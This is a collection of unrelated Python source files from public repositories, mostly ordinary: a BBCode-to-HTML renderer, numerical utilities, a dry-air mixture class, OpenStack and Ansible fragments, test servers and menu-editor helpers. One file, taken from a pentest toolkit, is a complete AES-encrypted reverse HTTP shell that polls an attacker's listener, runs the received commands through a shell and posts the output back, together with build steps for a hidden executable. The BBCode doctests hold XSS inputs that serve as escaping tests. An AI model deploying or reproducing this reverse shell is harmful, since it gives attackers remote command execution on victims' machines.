    {'pattern': r'\[url=%s\](.*?)\[/url\]' % URL_RE, 'repl': r'<a href="\1">\3</a>'},
    {'pattern': r'\[link\]%s\[/link\]' % URL_RE, 'repl': r'<a href="\1">\1</a>'},
    {'pattern': r'\[link=%s\](.*?)\[/link\]' % URL_RE, 'repl': r'<a href="\1">\3</a>'},
    {'pattern': r'\[email\]%s\[/email\]' % EMAIL_RE, 'repl': r'<a href="mailto:\1">\1</a>'},
    {'pattern': r'\[email=%s\](.*?)\[/email\]' % EMAIL_RE, 'repl': r'<a href="mailto:\1">\5</a>'},
    {'pattern': r'\[img\]%s\[/img\]' % URL_RE, 'repl': r'<img src="\1">'},
    {'pattern': r'\[img=%s\](.*?)\[/img\]' % URL_RE, 'repl': r'<img src="\1" alt="\3">'},
    {'pattern': r'\[color=([a-zA-Z]*|\#?[0-9a-fA-F]{6})\](.*?)\[/color\]',
     'repl': r'<span style="color:\1">\2</span>'},
    {'pattern': r'\[b\](.*?)\[/b\]', 'repl': r'<strong>\1</strong>'},
    {'pattern': r'\[i\](.*?)\[/i\]', 'repl': r'<em>\1</em>'},
    {'pattern': r'\[u\](.*?)\[/u\]', 'repl': r'<u>\1</u>'},
    {'pattern': r'\[s\](.*?)\[/s\]', 'repl': r'<strike>\1</strike>'},
    {'pattern': r'\[quote\](.*?)\[/quote\]', 'repl': r'<blockquote>\1</blockquote>', 'nested': 5},
    {'pattern': r'\[quote=(.*?)\](.*?)\[/quote\]',
     'repl': r'<blockquote><em>\1</em> <br /> \2</blockquote>', 'nested': 5},
    {'pattern': r'\[center\](.*?)\[/center\]', 'repl': r'<div style="text-align: center;">\1</div>'},
    {'pattern': r'\[big\](.*?)\[/big\]', 'repl': r'<big>\1</big>'},
    {'pattern': r'\[small\](.*?)\[/small\]', 'repl': r'<small>\1</small>'},
    {'pattern': r'\[list\](.*?)\[/list\]', 'repl': r'<ul>\1</ul>'},
    {'pattern': r'\[list\=(\d+)\](.*?)\[/list\]', 'repl': r'<ol start="\1">\2</ol>'},
    {'pattern': r'\[\*\](.*?)<br./>', 'repl': r'<li>\1</li>'},
    {'pattern': r'\[br\]', 'repl': r'<br />'},
]

# Site-specific extra rules are merged in, then rules are ordered so higher
# sortkey runs first ([code] must precede everything else).
BBCODE_RULES += getattr(settings, 'BBMARKUP_EXTRA_RULES', [])
BBCODE_RULES.sort(key=lambda r: r.get('sortkey', 0), reverse=True)

# Compile all patterns once at import time; BBMARKUP_CUSTOM_RULES, when set,
# REPLACES the default rule set entirely rather than extending it.
BBCODE_RULES_COMPILED = []
for bbset in (getattr(settings, 'BBMARKUP_CUSTOM_RULES', []) or BBCODE_RULES):
    bbset['pattern'] = re.compile(bbset['pattern'], re.DOTALL | re.IGNORECASE)
    bbset.setdefault('sortkey', 0)
    bbset.setdefault('nested', 0)
    BBCODE_RULES_COMPILED.append(bbset)


def bbcode(value, code_parser=code_parser):
    """
    Render BBCode markup in `value` to safe HTML.

    >>> data = '[code]print "Lorem [b]imsum[b]"[/code]'
    >>> bbcode(data)
    u'<pre><code>print &quot;Lorem &#91;b&#93;imsum&#91;b&#93;&quot;</code></pre>'
    >>> bbcode('[i]Lorem[/i] \\n [s]imsum[/s]')
    u'<em>Lorem</em> <br /> <strike>imsum</strike>'
    >>> bbcode('[list] [*] 1\\n [*]2\\n [*] 3\\n[/list]')
    u'<ul> <li> 1</li> <li>2</li> <li> 3</li></ul>'
    >>> bbcode('[list=2] [*] a\\n [*]b\\n [*] c\\n[/list]')
    u'<ol start="2"> <li> a</li> <li>b</li> <li> c</li></ol>'
    >>> bbcode("[code]print 123\\nprint '<br/>'[/code]")
    u'<pre><code>print 123\\nprint &#39;&lt;br/&gt;&#39;</code></pre>'
    >>> bbcode('[quote=test user]Test quote text[/quote]')
    u'<blockquote><em>test user</em> <br /> Test quote text</blockquote>'
    >>> bbcode("[quote]Lorem [quote=sl]imsum[/quote] blabla [/quote]")
    u'<blockquote>Lorem <blockquote><em>sl</em> <br /> imsum</blockquote> blabla </blockquote>'
    >>> bbcode('[color=red]Lorem[/color]')
    u'<span style="color:red">Lorem</span>'
    >>> bbcode('[color=#FAaF12]Lorem[/color]')
    u'<span style="color:#FAaF12">Lorem</span>'
    >>> bbcode('[color=#FAaF121]Lorem[/color]')
    u'[color=#FAaF121]Lorem[/color]'
    >>> bbcode('[url]http://slav0nic.org.ua[/url]]')
    u'<a href="http://slav0nic.org.ua">http://slav0nic.org.ua</a>]'
    >>> bbcode('[url]http://slav0nic.org.ua[/url]')
    u'<a href="http://slav0nic.org.ua">http://slav0nic.org.ua</a>'
    >>> bbcode('[url] ftp://slav0nic.org.ua/test [/url]')
    u'<a href="ftp://slav0nic.org.ua/test">ftp://slav0nic.org.ua/test</a>'
    >>> bbcode('[url] http://slav0nic.org.ua:80/test/foo.py?s=bar#foo1[/url]')
    u'<a href="http://slav0nic.org.ua:80/test/foo.py?s=bar#foo1">http://slav0nic.org.ua:80/test/foo.py?s=bar#foo1</a>'
    >>> bbcode('[link=http://test.com/] test [/link]')
    u'<a href="http://test.com/"> test </a>'
    >>> bbcode('[url= http://test.com/ ] test [/url]')
    u'<a href="http://test.com/"> test </a>'
    >>> bbcode('[url= http://test.com/][/url]')
    u'<a href="http://test.com/"></a>'
    >>> bbcode('[img] https://slav0nic.org.ua:80/test/logo.png [/img]')
    u'<img src="https://slav0nic.org.ua:80/test/logo.png">'
    >>> bbcode('[img]javascript:alert("XSS");[/img]')
    u'[img]javascript:alert("XSS");[/img]'
    >>> bbcode('''[email]blabla@test.com" onmouseover="alert('Hacked');[/email]''')
    u'[email]blabla@test.com&quot; onmouseover=&quot;alert(&#39;Hacked&#39;);[/email]'
    >>> bbcode('[email] blabla@test.com [/email]')
    u'<a href="mailto:blabla@test.com">blabla@test.com</a>'
    >>> bbcode('[email]blabla@test.com[/email]')
    u'<a href="mailto:blabla@test.com">blabla@test.com</a>'
    >>> bbcode('[email= blabla@test.com ] Blablasha :][/email]')
    u'<a href="mailto:blabla@test.com"> Blablasha :]</a>'
    """
    # HTML-escape user input first, then turn newlines into <br /> so the
    # [*] list-item rule (which anchors on <br./>) can match.
    value = escape(value)
    value = linebreaksbr(value)
    for bbset in BBCODE_RULES_COMPILED:
        # Run the substitution 'nested'+1 times so tags such as [quote]
        # nested inside themselves are expanded up to that depth.
        for _ in xrange(bbset['nested'] + 1):
            value = bbset['pattern'].sub(bbset['repl'], value)
    return mark_safe(value)
colinmorris/char-rbm
refs/heads/master
Utils.py
1
# Utility helpers for the char-rbm project: text -> one-hot vectorization and
# softmax sampling over 3-D activation arrays.  (Python 2 code: uses the
# `print` statement and `xrange`.)
import numpy as np
import time
import logging
from collections import Counter

from ShortTextCodec import NonEncodableTextException
from sklearn.preprocessing import OneHotEncoder

# When False, the timeit decorator is a no-op.
DEBUG_TIMING = False


# Taken from StackOverflow
def timeit(f):
    """Decorator printing f's wall-clock duration when DEBUG_TIMING is on."""
    if not DEBUG_TIMING:
        # Timing disabled: return the function unwrapped, zero overhead.
        return f

    def timed(*args, **kw):
        ts = time.time()
        result = f(*args, **kw)
        te = time.time()
        print 'func:%r took: %2.4f sec' % \
            (f.__name__, te - ts)
        return result
    return timed


def vectors_from_txtfile(fname, codec, limit=-1, mutagen=None):
    """Encode each line of the file at `fname` with `codec` and return the
    one-hot encoded matrix.  Lines the codec rejects are counted and skipped.

    limit: stop after this many successfully encoded lines (-1 = no limit).
    mutagen: passed through to codec.encode — assumed to be an optional
             text-mutation hook; confirm against ShortTextCodec.
    """
    f = open(fname)
    skipped = Counter()
    vecs = []
    for line in f:
        line = line.strip()
        try:
            vecs.append(codec.encode(line, mutagen=mutagen))
            if len(vecs) == limit:
                break
        except NonEncodableTextException as e:
            # Too long, or illegal characters
            skipped[e.reason] += 1
    logging.debug("Gathered {} vectors. Skipped {} ({})".format(len(vecs), sum(skipped.values()), dict(skipped)))
    vecs = np.asarray(vecs)
    # TODO: Why default to dtype=float? Seems wasteful? Maybe it doesn't really matter. Actually, docs here seem inconsistent? Constructor docs say default float. transform docs say int. Should file a bug on sklearn.
    return OneHotEncoder(len(codec.alphabet)).fit_transform(vecs)


# Adapted from sklearn.utils.extmath.softmax
def softmax(X, copy=True):
    """Softmax over the last axis of a 3-D array X of shape (n, M, N).

    copy=False normalizes X in place.
    """
    if copy:
        X = np.copy(X)
    X_shape = X.shape
    a, b, c = X_shape
    # This will cause overflow when large values are exponentiated.
    # Hence the largest value in each row is subtracted from each data
    # point to guarantee the exponent stays <= 0.
    max_prob = np.max(X, axis=2).reshape((X.shape[0], X.shape[1], 1))
    X -= max_prob
    # In-place exponentiation (second arg is the output array).
    np.exp(X, X)
    sum_prob = np.sum(X, axis=2).reshape((X.shape[0], X.shape[1], 1))
    X /= sum_prob
    return X


def softmax_and_sample(X, copy=True):
    """
    Given an array of 2-d arrays, each having shape (M, N) representing M
    softmax units with N possible values each, return an array of the same
    shape where each N-dimensional inner array has a 1 at one index, and zero
    everywhere else. The 1 is assigned according to the corresponding softmax
    probabilities (i.e. np.exp(X) / np.sum(np.exp(X)) )

    Parameters
    ----------
    X: array-like, shape (n_samples, M, N), dtype=float
        Argument to the logistic function

    copy: bool, optional
        Copy X or not.

    Returns
    -------
    out: array of 0,1, shape (n_samples, M, N)
        Softmax function evaluated at every point in x and sampled
    """
    a, b, c = X.shape
    X_shape = X.shape
    X = softmax(X, copy)
    # We've got our probabilities, now sample from them: one uniform
    # threshold per softmax unit, compared against the CDF along axis 2.
    thresholds = np.random.rand(X.shape[0], X.shape[1], 1)
    cumsum = np.cumsum(X, axis=2, out=X)
    x, y, z = np.indices(cumsum.shape)
    # This relies on the fact that, if there are multiple instances of the max
    # value in an array, argmax returns the index of the first one
    to_select = np.argmax(cumsum > thresholds, axis=2).reshape(a, b, 1)
    bin_sample = np.zeros(X_shape)
    bin_sample[x, y, to_select] = 1
    return bin_sample
TomTranter/OpenPNM
refs/heads/master
openpnm/phases/mixtures/DryAir.py
1
from openpnm.phases.mixtures import IdealGas, species
import openpnm.models as mods
from openpnm.utils import logging
logger = logging.getLogger(__name__)


class DryAir(IdealGas):
    r"""
    Ideal-gas mixture representing dry air.

    The mixture is built from two component species — nitrogen at a mole
    fraction of 0.791 and oxygen at 0.209 — and a Fuller-correlation
    diffusivity model is attached for each component.
    """

    def __init__(self, network, **kwargs):
        # Start from an empty ideal-gas mixture and fill in the pieces below.
        super().__init__(network=network, components=[], **kwargs)

        nitrogen = species.gases.N2(network=network, name='N2_'+self.name)
        oxygen = species.gases.O2(network=network, name='O2_'+self.name)
        self.set_component([oxygen, nitrogen])

        # Standard dry-air composition on a mole basis.
        self.set_mole_fraction(component=nitrogen, values=0.791)
        self.set_mole_fraction(component=oxygen, values=0.209)

        # The same Fuller diffusivity model serves both components.
        for propname in ('pore.diffusivity.N2', 'pore.diffusivity.O2'):
            self.add_model(propname=propname,
                           model=mods.phases.mixtures.fuller_diffusivity)
jianghuaw/nova
refs/heads/master
nova/policies/instance_usage_audit_log.py
6
# Copyright 2016 Cloudbase Solutions Srl # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_policy import policy from nova.policies import base BASE_POLICY_NAME = 'os_compute_api:os-instance-usage-audit-log' instance_usage_audit_log_policies = [ policy.DocumentedRuleDefault( BASE_POLICY_NAME, base.RULE_ADMIN_API, "List all usage audits and that occurred before a specified time " "for all servers on all compute hosts where usage auditing is " "configured", [ { 'method': 'GET', 'path': '/os-instance_usage_audit_log' }, { 'method': 'GET', 'path': '/os-instance_usage_audit_log/{before_timestamp}' } ]), ] def list_rules(): return instance_usage_audit_log_policies
goofwear/raspberry_pwn
refs/heads/master
src/pentest/revshells/encrypted_http_shell/shell.py
5
#!/usr/bin/python
# AES Encrypted Reverse HTTP Shell by:
#     Dave Kennedy (ReL1K)    http://www.secmaniac.com
#
# Requires pyCrypto (binary modules recommended):
#     http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
# Works on any platform you compile it on: OSX, Windows, Linux, etc.
# Compiled with pyinstaller (py2exe needs an extra dll, so it was not used):
#     export VERSIONER_PYTHON_PREFER_32_BIT=yes
#     python Configure.py
#     python Makespec.py --onefile --noconsole shell.py
#     python Build.py shell/shell.spec
#
# (Python 2 script: urllib2/httplib and the print statement.)

import urllib
import urllib2
import httplib
import subprocess
import sys
import base64
import os

from Crypto.Cipher import AES

# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32

# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'

# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

# secret key, change this if you want to be unique
secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2"

# create a cipher object using the random secret
cipher = AES.new(secret)

# TURN THIS ON IF YOU WANT PROXY SUPPORT
PROXY_SUPPORT = "OFF"

# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxyinfo:80"

# USERNAME FOR THE PROXY
USERNAME = "username"

# PASSWORD FOR THE PROXY
PASSWORD = "password"

# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
    auth_handler = urllib2.HTTPBasicAuthHandler()
    auth_handler.add_password(realm='RESTRICTED ACCESS',
                              uri=PROXY_URL,  # PROXY SPECIFIED ABOVE
                              user=USERNAME,  # USERNAME SPECIFIED ABOVE
                              passwd=PASSWORD)  # PASSWORD SPECIFIED ABOVE
    opener = urllib2.build_opener(auth_handler)
    urllib2.install_opener(opener)

try:
    # our reverse listener ip address
    address = sys.argv[1]
    # our reverse listener port address
    port = sys.argv[2]

# except that we didn't pass parameters
except IndexError:
    print " \nAES Encrypted Reverse HTTP Shell by:"
    print " Dave Kennedy (ReL1K)"
    print " http://www.secmaniac.com"
    print "Usage: shell.exe <reverse_ip_address> <port>"
    sys.exit()

# loop forever
while 1:
    # open up our request handelr
    req = urllib2.Request('http://%s:%s' % (address,port))
    # grab our response which contains what command we want
    message = urllib2.urlopen(req)
    # base64 unencode
    message = base64.b64decode(message.read())
    # decrypt the communications
    message = DecodeAES(cipher, message)
    # quit out if we receive that command
    if message == "quit" or message == "exit":
        sys.exit()
    # issue the shell command we want
    proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # read out the data of stdout
    data = proc.stdout.read() + proc.stderr.read()
    # encrypt the data
    data = EncodeAES(cipher, data)
    # base64 encode the data
    data = base64.b64encode(data)
    # urlencode the data from stdout
    # NOTE(review): this urlencodes the literal '%s' (yielding 'cmd=%25s') and
    # then %-formats `data` through the resulting '%25s' width spec, so the
    # payload is sent WITHOUT urlencoding ('+'/'=' from base64 go out raw).
    # Likely intended: urllib.urlencode({'cmd': data}) — confirm against the
    # listener's parsing before changing.
    data = urllib.urlencode({'cmd': '%s'}) % (data)
    # who we want to connect back to with the shell
    h = httplib.HTTPConnection('%s:%s' % (address,port))
    # set our basic headers
    headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    # actually post the data
    h.request('POST', '/index.aspx', data, headers)
Yannig/ansible
refs/heads/devel
lib/ansible/utils/module_docs_fragments/aireos.py
131
#
# (c) 2017, James Mighion <@jmighion>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible.  If not, see <http://www.gnu.org/licenses/>.


class ModuleDocFragment(object):

    # Standard AireOS connection documentation fragment, shared by the aireos
    # modules via extends_documentation_fragment.  (The original comment said
    # "files documentation fragment" — a copy-paste from another fragment.)
    # Fix: removed the stray period in "connection to the remote. device.".
    DOCUMENTATION = """
options:
  provider:
    description:
      - A dict object containing connection details.
    default: null
    suboptions:
      host:
        description:
          - Specifies the DNS host name or address for connecting to the remote
            device over the specified transport.  The value of host is used as
            the destination address for the transport.
        required: true
      port:
        description:
          - Specifies the port to use when building the connection to the remote
            device.
        default: 22
      username:
        description:
          - Configures the username to use to authenticate the connection to
            the remote device.  This value is used to authenticate
            the SSH session. If the value is not specified in the task, the
            value of environment variable C(ANSIBLE_NET_USERNAME) will be used instead.
      password:
        description:
          - Specifies the password to use to authenticate the connection to
            the remote device.   This value is used to authenticate
            the SSH session. If the value is not specified in the task, the
            value of environment variable C(ANSIBLE_NET_PASSWORD) will be used instead.
        default: null
      timeout:
        description:
          - Specifies the timeout in seconds for communicating with the network device
            for either connecting or sending commands.  If the timeout is
            exceeded before the operation is completed, the module will error.
        default: 10
      ssh_keyfile:
        description:
          - Specifies the SSH key to use to authenticate the connection to
            the remote device.   This value is the path to the
            key used to authenticate the SSH session. If the value is not specified
            in the task, the value of environment variable C(ANSIBLE_NET_SSH_KEYFILE)
            will be used instead.
"""
Wyliodrin/wyliodrin-server
refs/heads/master
tests/localhost/servers/server3.py
1
# Test connection error logs import BaseHTTPServer, SimpleHTTPServer import SocketServer import ssl import os import json class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): l = [] def do_POST(self): length = int(self.headers['Content-Length']) r_json = json.loads(self.rfile.read(length).decode('utf-8')) ServerHandler.l += r_json["str"].split("[")[1:] if len(ServerHandler.l) >= 3: if ServerHandler.l[1].startswith("ERROR: ") and "XMPP connection error" in ServerHandler.l[1]: print "Second log is ERROR about XMPP connection error" else: print "Second log is not ERROR about XMPP connection error" os._exit(1) if ServerHandler.l[2].startswith("ERROR: ") and "Retrying to connect" in ServerHandler.l[2]: print "Third log is ERROR about XMPP connection retry" os._exit(0) else: print "Third log is not ERROR about XMPP connection retry" os._exit(1) httpd = BaseHTTPServer.HTTPServer(('localhost', 443), ServerHandler) httpd.socket = ssl.wrap_socket(httpd.socket, certfile='./certificate/server.pem', server_side=True) print "Test server up and running" httpd.serve_forever()
glls/Cinnamon
refs/heads/master
files/usr/share/cinnamon/cinnamon-menu-editor/cme/util.py
6
# -*- coding: utf-8 -*- # Alacarte Menu Editor - Simple fd.o Compliant Menu Editor # Copyright (C) 2006 Travis Watkins # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Library General Public # License as published by the Free Software Foundation; either # version 2 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Library General Public License for more details. # # You should have received a copy of the GNU Library General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Suite 500, Boston, MA 02110-1335 USA import os import xml.dom.minidom import uuid from collections import Sequence from gi.repository import Gtk, GdkPixbuf, CMenu, GLib, Gdk DESKTOP_GROUP = GLib.KEY_FILE_DESKTOP_GROUP KEY_FILE_FLAGS = GLib.KeyFileFlags.KEEP_COMMENTS | GLib.KeyFileFlags.KEEP_TRANSLATIONS def fillKeyFile(keyfile, items): for key, item in items.items(): if item is None: continue if isinstance(item, bool): keyfile.set_boolean(DESKTOP_GROUP, key, item) elif isinstance(item, str): keyfile.set_string(DESKTOP_GROUP, key, item) elif isinstance(item, Sequence): keyfile.set_string_list(DESKTOP_GROUP, key, item) def getNameFromKeyFile(keyfile): return keyfile.get_string(DESKTOP_GROUP, "Name") def getUniqueFileId(name, extension): while 1: filename = name + '-' + str(uuid.uuid1()) + extension if extension == '.desktop': path = getUserItemPath() if not os.path.isfile(os.path.join(path, filename)) and not getItemPath(filename): break elif extension == '.directory': path = getUserDirectoryPath() if not os.path.isfile(os.path.join(path, filename)) and not getDirectoryPath(filename): break return filename def getUniqueRedoFile(filepath): while 1: new_filepath = filepath + 
'.redo-' + str(uuid.uuid1()) if not os.path.isfile(new_filepath): break return new_filepath def getUniqueUndoFile(filepath): filename, extension = os.path.split(filepath)[1].rsplit('.', 1) while 1: if extension == 'desktop': path = getUserItemPath() elif extension == 'directory': path = getUserDirectoryPath() elif extension == 'menu': path = getUserMenuPath() new_filepath = os.path.join(path, filename + '.' + extension + '.undo-' + str(uuid.uuid1())) if not os.path.isfile(new_filepath): break return new_filepath def getItemPath(file_id): for path in GLib.get_system_data_dirs(): file_path = os.path.join(path, 'applications', file_id) if os.path.isfile(file_path): return file_path return None def getUserItemPath(): item_dir = os.path.join(GLib.get_user_data_dir(), 'applications') if not os.path.isdir(item_dir): os.makedirs(item_dir) return item_dir def getDirectoryPath(file_id): for path in GLib.get_system_data_dirs(): file_path = os.path.join(path, 'desktop-directories', file_id) if os.path.isfile(file_path): return file_path return None def getUserDirectoryPath(): menu_dir = os.path.join(GLib.get_user_data_dir(), 'desktop-directories') if not os.path.isdir(menu_dir): os.makedirs(menu_dir) return menu_dir def getUserMenuPath(): menu_dir = os.path.join(GLib.get_user_config_dir(), 'menus') if not os.path.isdir(menu_dir): os.makedirs(menu_dir) return menu_dir def getSystemMenuPath(file_id): for path in GLib.get_system_config_dirs(): file_path = os.path.join(path, 'menus', file_id) if os.path.isfile(file_path): return file_path return None def getUserMenuXml(tree): system_file = getSystemMenuPath(os.path.basename(tree.get_canonical_menu_path())) name = tree.get_root_directory().get_menu_id() menu_xml = "<!DOCTYPE Menu PUBLIC '-//freedesktop//DTD Menu 1.0//EN' 'http://standards.freedesktop.org/menu-spec/menu-1.0.dtd'>\n" menu_xml += "<Menu>\n <Name>" + name + "</Name>\n " menu_xml += "<MergeFile type=\"parent\">" + system_file + "</MergeFile>\n</Menu>\n" return menu_xml 
class SurfaceWrapper: def __init__(self, surface): self.surface = surface def getIcon(item, widget): wrapper = SurfaceWrapper(None) pixbuf = None if item is None: return wrapper if isinstance(item, CMenu.TreeDirectory): gicon = item.get_icon() elif isinstance(item, CMenu.TreeEntry): app_info = item.get_app_info() gicon = app_info.get_icon() else: return wrapper if gicon is None: return wrapper icon_theme = Gtk.IconTheme.get_default() size = 24 * widget.get_scale_factor() info = icon_theme.lookup_by_gicon(gicon, size, 0) if info is None: return wrapper try: pixbuf = info.load_icon() except GLib.GError: return wrapper if pixbuf is None: return wrapper if pixbuf.get_width() != size or pixbuf.get_height() != size: pixbuf = pixbuf.scale_simple(size, size, GdkPixbuf.InterpType.HYPER) wrapper.surface = Gdk.cairo_surface_create_from_pixbuf (pixbuf, widget.get_scale_factor(), widget.get_window()) return wrapper def removeWhitespaceNodes(node): remove_list = [] for child in node.childNodes: if child.nodeType == xml.dom.minidom.Node.TEXT_NODE: child.data = child.data.strip() if not child.data.strip(): remove_list.append(child) elif child.hasChildNodes(): removeWhitespaceNodes(child) for node in remove_list: node.parentNode.removeChild(node) def menuSortKey(node): prefCats = ["administration", "preferences"] key = node.get_menu_id().lower() name = node.get_name().lower() if key in prefCats: name = "zzzz" + name # Hack for prefCats to be sorted at the end return name
bfirsh/django-old
refs/heads/master
tests/regressiontests/forms/validators.py
50
from unittest import TestCase from django import forms from django.core import validators from django.core.exceptions import ValidationError class TestFieldWithValidators(TestCase): def test_all_errors_get_reported(self): field = forms.CharField( validators=[validators.validate_integer, validators.validate_email] ) self.assertRaises(ValidationError, field.clean, 'not int nor mail') try: field.clean('not int nor mail') except ValidationError, e: self.assertEqual(2, len(e.messages))
tdruez/scancode-toolkit
refs/heads/master
src/scancode/__init__.py
3
# # Copyright (c) 2015 nexB Inc. and others. All rights reserved. # http://nexb.com and https://github.com/nexB/scancode-toolkit/ # The ScanCode software is licensed under the Apache License version 2.0. # Data generated with ScanCode require an acknowledgment. # ScanCode is a trademark of nexB Inc. # # You may not use this software except in compliance with the License. # You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software distributed # under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. # # When you publish or redistribute any data created with ScanCode or any ScanCode # derivative work, you must accompany this data with the following acknowledgment: # # Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, either express or implied. No content created from # ScanCode should be considered or used as legal advice. Consult an Attorney # for any legal advice. # ScanCode is a free software code scanning tool from nexB Inc. and others. # Visit https://github.com/nexB/scancode-toolkit/ for support and download. __version__ = '1.3.0'
labero/kupfer
refs/heads/master
waflib/extras/relocation.py
5
#! /usr/bin/env python # encoding: utf-8 """ Waf 1.6 Try to detect if the project directory was relocated, and if it was, change the node representing the project directory. Just call: waf configure build Note that if the project directory name changes, the signatures for the tasks using files in that directory will change, causing a partial build. """ import os from waflib import Build, ConfigSet, Task, Utils, Errors from waflib.TaskGen import feature, before_method, after_method EXTRA_LOCK = '.old_srcdir' old1 = Build.BuildContext.store def store(self): old1(self) db = os.path.join(self.variant_dir, EXTRA_LOCK) env = ConfigSet.ConfigSet() env.SRCDIR = self.srcnode.abspath() env.store(db) Build.BuildContext.store = store old2 = Build.BuildContext.init_dirs def init_dirs(self): if not (os.path.isabs(self.top_dir) and os.path.isabs(self.out_dir)): raise Errors.WafError('The project was not configured: run "waf configure" first!') srcdir = None db = os.path.join(self.variant_dir, EXTRA_LOCK) env = ConfigSet.ConfigSet() try: env.load(db) srcdir = env.SRCDIR except: pass if srcdir: d = self.root.find_node(srcdir) if d and srcdir != self.top_dir and getattr(d, 'children', ''): srcnode = self.root.make_node(self.top_dir) print("relocating the source directory %r -> %r" % (srcdir, self.top_dir)) srcnode.children = {} for (k, v) in d.children.items(): srcnode.children[k] = v v.parent = srcnode d.children = {} old2(self) Build.BuildContext.init_dirs = init_dirs def uid(self): try: return self.uid_ except AttributeError: # this is not a real hot zone, but we want to avoid surprizes here m = Utils.md5() up = m.update up(self.__class__.__name__.encode()) for x in self.inputs + self.outputs: up(x.path_from(x.ctx.srcnode).encode()) self.uid_ = m.digest() return self.uid_ Task.Task.uid = uid @feature('c', 'cxx', 'd', 'go', 'asm', 'fc', 'includes') @after_method('propagate_uselib_vars', 'process_source') def apply_incpaths(self): lst = self.to_incnodes(self.to_list(getattr(self, 
'includes', [])) + self.env['INCLUDES']) self.includes_nodes = lst bld = self.bld self.env['INCPATHS'] = [x.is_child_of(bld.srcnode) and x.path_from(bld.bldnode) or x.abspath() for x in lst]
TechnoJays/robot2015
refs/heads/master
archive/src/driver_station/target.py
6
"""This module describes information about vision targets.""" class Side(object): """Enumeration for which side of the wall a target is on.""" LEFT = 0 RIGHT = 1 UNKNOWN = 2 EITHER = 3 class Target(object): """Target information.""" side = None distance = None angle = None is_hot = False confidence = None no_targets = False def __init__(self, **values): """Create a target using a dictionary. Args: **values: a keyword dictionary with the values. """ if values: self.__dict__.update(values) else: self.side = None self.distance = None self.angle = None self.is_hot = None self.confidence = None self.no_targets = False
ftomassetti/intellij-community
refs/heads/master
python/testData/refactoring/move/packageImport/after/src/a.py
45382
jonfaustman/django-frontend
refs/heads/master
run_tests.py
1
import os, sys from django.conf import settings import django DIRNAME = os.path.dirname(__file__) if django.VERSION[1] < 4: # If the version is NOT django 4 or greater # then remove the TZ setting. settings.configure( DATABASES={ 'default': { 'ENGINE': 'django.db.backends.sqlite3', } }, ROOT_URLCONF = 'djfrontend.tests.urls', STATIC_URL = '/static/', INSTALLED_APPS = ( 'django.contrib.staticfiles', 'djfrontend', ) ) else: settings.configure(DATABASES={ 'default': { 'ENGINE': 'django.db.backends.sqlite3', } }, ROOT_URLCONF = 'djfrontend.tests.urls', STATIC_URL = '/static/', INSTALLED_APPS = ( 'django.contrib.staticfiles', 'djfrontend', ), USE_TZ=True) try: # Django 1.7 needs this, but other versions dont. django.setup() except AttributeError: pass from django.test.runner import DiscoverRunner test_runner = DiscoverRunner(verbosity=1) failures = test_runner.run_tests(['djfrontend', ]) if failures: sys.exit(failures)
t-hey/QGIS-Original
refs/heads/master
python/plugins/processing/gui/ContextAction.py
6
# -*- coding: utf-8 -*- """ *************************************************************************** ContextAction.py --------------------- Date : August 2012 Copyright : (C) 2012 by Victor Olaya Email : volayaf at gmail dot com *************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * *************************************************************************** """ __author__ = 'Victor Olaya' __date__ = 'August 2012' __copyright__ = '(C) 2012, Victor Olaya' # This will get replaced with a git SHA1 when you do a git archive __revision__ = '$Format:%H$' from qgis.PyQt.QtCore import QCoreApplication class ContextAction: def setData(self, itemData, toolbox): self.itemData = itemData self.toolbox = toolbox def tr(self, string, context=''): if context == '': context = 'ContextAction' return QCoreApplication.translate(context, string)
seann1/portfolio5
refs/heads/master
.meteor/dev_bundle/python/Lib/test/test_StringIO.py
84
